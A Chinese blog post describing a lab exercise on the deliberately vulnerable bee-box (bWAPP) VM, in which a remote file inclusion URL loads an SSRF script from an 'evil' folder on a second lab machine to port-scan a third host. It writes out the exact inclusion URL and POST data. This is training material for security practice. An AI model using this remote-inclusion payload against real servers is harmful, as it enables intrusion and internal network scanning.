利用bee_box 平台测试端口扫描

最新推荐文章于 2023-12-16 17:56:37 发布
最新推荐文章于 2023-12-16 17:56:37 发布
阅读量1.2k 收藏
点赞数
分类专栏: 原创 文章标签: 端口 扫描
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42057250/article/details/85473528
版权

一、软件硬件平台

  1. 操作系统:windows 7、windows 2003、bee-box v1.6、windows 10
  2. 硬件平台:12g内存
  3. 软件:Firefox、xampp、hackbarvmware workstations

二、端口扫描

  1. 安装bee-box

Bee系统是一个Ubuntu系统,但是对命令行界面的操作不多,不需要过多的配置,使用web进行远程操作所以使用起来是相当方便的。使用vmware安装bee后可以看到这样的界面。

 

  2.使用web连接bee

因为是Ubuntu系统,所以直接使用命令行界面查看ip地址。这里的地址是:192.168.216.136,用Firefox浏览器登陆bee时点击bwapp后需要输入用户和密码才能继续进行本次实验。

  3.选择SSRF

找到Server Side Request Forgery(SSRF),点进去后点击第一个选项拿到SSRF攻击脚本。把脚本用TXT保存起来并命名为ssrf-1.txt

  4.存放攻击脚本

开启作为攻击的服务器,也就是win2003:192.168.216.127,在根目录上新建文件夹evil,并且把ssrf-1.txt放在evil里面,形成URL:192.168.216.127\evil\ssrf.txt

  5.开启被攻击的服务器

本次实验是端口扫描,所以只要保证被攻击的服务器是开启的状态的可以了,并不需要对其进行访问。实验用机的地址为:192.168.216.128。

  6.选择RFI LFI

回到浏览器下的bee页面,在右上选择Remote & Local File Inclusion (RFI/LFI),可以看到一个选择语言的的选项,默认英语直接点击go,生成了一条URL:http://192.168.216.136/bWAPP/rlfi.php?language=lang_en.php&action=go

  7.打开hackbar

打开Firefox的hackbar工具,把上面获取的URL中的lang_en.php替换成http://192.168.216.127/evil/ssrf.txt,也就是:http://192.168.216.136/bWAPP/rlfi.php?language=http://192.168.216.127/evil/ssrf-1.txt&action=go,让网站直接读取脚本文件。勾选post data后在下面的文本框里输入:ip=192.168.216.128,指定端口扫描的服务器地址。

  8.进行端口扫描

点击左边的Execute提交数据,可以看到端口扫描的结果是80和3306端口是开放的。

到192.168.216.128查看开放的端口,发现确实是80和3306端口

  9.测试

这个时候我们关闭被攻击服务器的80端口,回到hackbar重新提交数据,可以看到端口扫描的结果只有一个3306端口。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

严严严严严严严
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bee-box
Xi4or0uji
09-18 4654
这篇博客就是为了记下bee-box做题过程,随便记记,免得忘了 安装 先去官网下载了,然后分个新的盘单独放进去,打开虚拟机,双击bee-box.vmx就能安装了 打开里面的火狐会自动跳去一个登录界面,默认账号和密码是bee/bug,登录然后就能做题了 我是美丽的分割线------------------------------------- 接下来讲漏洞 HTML Injection ...
Bee-Box 虚拟机下载及安装
Peter 的博客
09-07 9464
Bee-Box 虚拟机下载及安装 Bee-box官方称呼BWAPP,buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵盖了所有主要的已知Web漏洞,包括OWASPTop10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。 ...
XEE之bee-box练习
qq_43571759的博客
02-27 720
前言 下载好靶机环境打开即可bee-box 虚拟机版本直接打开就可,在使用之前会有键盘乱序的问题,网上有修改教程很简单修改一下就好啦; 做实验之前先大致介绍XEE攻击(看了一个学习视频总结的): 首先当然是要了解xml是什么: XML(extensible makeup language)扩展标记语言,是一种常用的标记语言; 和HTML相似,最大的区别就是HTML和数据相关,而xml更多与数据传输...
关于端口
beeworkshop的博客
07-25 387
端口范围:1~65535 公认端口范围:1~1023 系统预留端口,主要用于知名服务。Linux做了安全限制,普通用户无法绑定这些端口,只有root才能绑定和使用公认端口。 注册端口范围:1024~49151 主要用于分配给用户进程和应用程序。 动态端口范围:49152~65535 系统进程和应用程序申请时动态分配。 注意: 对于公认端口,只有root用户才能绑定使用。因此对于80...
SSRF之bee-box练习
qq_43571759的博客
02-29 1978
SSRF (Server-side Request Forgery,服务器请求伪造)漏洞,是一种攻击者构造请求,是一种攻击者发起的伪造由服务器发起请求的一种攻击。 SSRF危害 * 端口扫描 * 利用file文件协议 读取本地文件 * 内网web 应用指纹识别 * 攻击内网web 端口扫描和读取文件的危害会在等下练习的时候体现出来; 漏洞发现: 其中对外发起网络请求的地方都可能存在SSRF漏洞...
qap.rar_bee_matlab QAP_qap
09-21
在本压缩包"qap.rar_bee_matlab QAP_qap"中,提供了一种基于蜜蜂算法(Bee Algorithm)来求解QAP的MATLAB实现。 蜜蜂算法是一种模拟自然生态系统中蜜蜂寻找花粉源的行为而设计的优化算法,它具有简单、灵活和易于...
Artificial Bee Colony.zip_artificial bee_matlab bee
07-14
总结来说,"Artificial Bee Colony.zip_artificial bee_matlab bee" 文件内容很可能包含了使用Matlab实现人工蜂群算法的详细步骤、代码示例以及可能的应用案例,旨在帮助用户理解和运用这种优化算法。通过理解和掌握...
YPEA114 Artificial Bee Colony.rar_artificial bee_whichrzj_yarpiz
07-15
改进的人工蜂群算法,克服蜂群算法目前存在的缺点
ABC_MATLAB_web.rar_ABC_Bee Colony_bee_蜂群 仿真_蜂群算法
07-14
基于人工蜂群算法的多方面的问题用matlab软件进行了仿真以及相关细节方面的描述和编程
YPEA114 Artificial Bee Colony.rar_bee_lssvm
09-14
综上所述,"YPEA114 Artificial Bee Colony.rar_bee_lssvm"的研究不仅揭示了生物启发式算法在解决复杂优化问题中的潜力,也为机器学习领域的参数调优提供了一个创新思路。通过将人工蜂群算法应用于LSSVM,我们可以...
Bee-box1.6 虚拟机镜像包及键盘设置
n5xxxx__zy的博客
07-15 1289
下载地址:https://pan.baidu.com/s/1CCtQZ5kYDQx-IsvoHlo3Zg 密码:al5k 键盘设置如下:
beebox靶场A1 low 命令注入通关教程(下)
最新发布
dj445566的博客
12-16 961
本文为beebox(小蜜蜂)系列靶场A1 LOW级别命令注入的解题思路与方法,大家多多练习
“心脏滴血”漏洞复现
m0_60429594的博客
12-16 5292
“心脏滴血”简介: Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。如同漏洞成因所讲,我们可以通过该漏洞读取每次攻击泄露出来的信息,所以可能也可以获取到服务器的私钥,用户cookie和密码等。所以本次会将“心脏滴血”漏洞进行复现。 1.环境准备 虚拟机准备: bee-box v1.6
利用平台漏洞
2301_78833225的博客
07-02 120
3.用nmap 上带的ssl-heartbleed.nse脚本对目标机器进行扫描看是否存在heartbleed漏洞:(使用nmap的ssl-heartbleed.nse脚本扫描bee-box靶机的8443端口,看是否看是否存在heartbleed漏洞)2.用nmap -O 192.168.xx.xx(填入bee-box的IP) 查看一下开放端口,找到https-alt的端口:(在kali,也就是攻击主机中扫描bee-box,查看bee-box的开放端口,目的是找到https-alt的端口
bee-box之XSS攻击(附上篇总结)
qq_43571759的博客
03-20 3141
bwapp的xss练习笔记附上篇总结 前言 一个月前刷了XSSchalleng以为自己已经算是入门了XSS了,但是在我挖洞碰到有可能存在XSS漏洞网页的时候,发现我只能记起来<script>alert('xss')</script> 等等最基本的,绕过方式忘得一干二净,果然一句话说得好!对于我这种没有天赋的人,重复就是记忆它妈!!! 再就是上次刷题的我居然没有总结,那可是我...
bWAPP 环境搭建 安装虚拟机版本 bee-box
mixboot
10-13 4751
macOS bWAPP环境搭建1,安装VMware Fusion2,下载bWAPP: bee-box (v1.6) 1,安装VMware Fusion 2,下载bWAPP: bee-box (v1.6) bWAPP: bee-box (v1.6)下载 参考: BWAPP 玩法总结
Bee-box之键盘乱序问题
Ray
03-21 2889
Bee-box官方称呼BWAPP,buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵盖了所有主要的已知Web漏洞,包括OWASPTop10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。 1 安装bee-box v1.6镜像到VM
Bee-Box 靶场搭建和键盘乱序问题
maxle的博客
04-14 1581
bWAPP - Browse /bee-box at SourceForge.netan extremely buggy web app !https://sourceforge.net/projects/bwapp/files/bee-box/官网如上: 解压后 VMware文件处去相应的解压目录打开或者扫描虚拟机都可以。 直接打开虚拟机,不需要登陆用户直接进入虚拟机,直接打开左上角的火狐浏览器,进入一个登陆界面。 用户bee,密码bug 键盘乱码解决:system-->...
const _bee_value *BeeSetValue; const _bee_value code Power_On[4]= { {F_1_85K,BEE_TIME_75MS,BEE_TIME_110MS}, {F_2_10K,BEE_TIME_75MS,BEE_TIME_110MS}, {F_2_40K,BEE_TIME_75MS,BEE_TIME_110MS}, {F_2_85K,BEE_TIME_75MS,BEE_TIME_988MS} };BeeSetValue = Power_On;如何求BeeSetValue所指向数组的元素的个数
05-31
可以使用 sizeof 操作符来计算 BeeSetValue 所指向数组的总大小,再除以一个元素的大小来得到元素的个数。即: ``` int num = sizeof(Power_On) / sizeof(Power_On[0]); ``` 这里的 `Power_On[0]` 指的是数组中的第一个元素,它的大小就是一个 `_bee_value` 结构体的大小。`sizeof(Power_On)` 得到的是整个数组的大小,除以 `_bee_value` 结构体的大小得到的就是元素的个数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值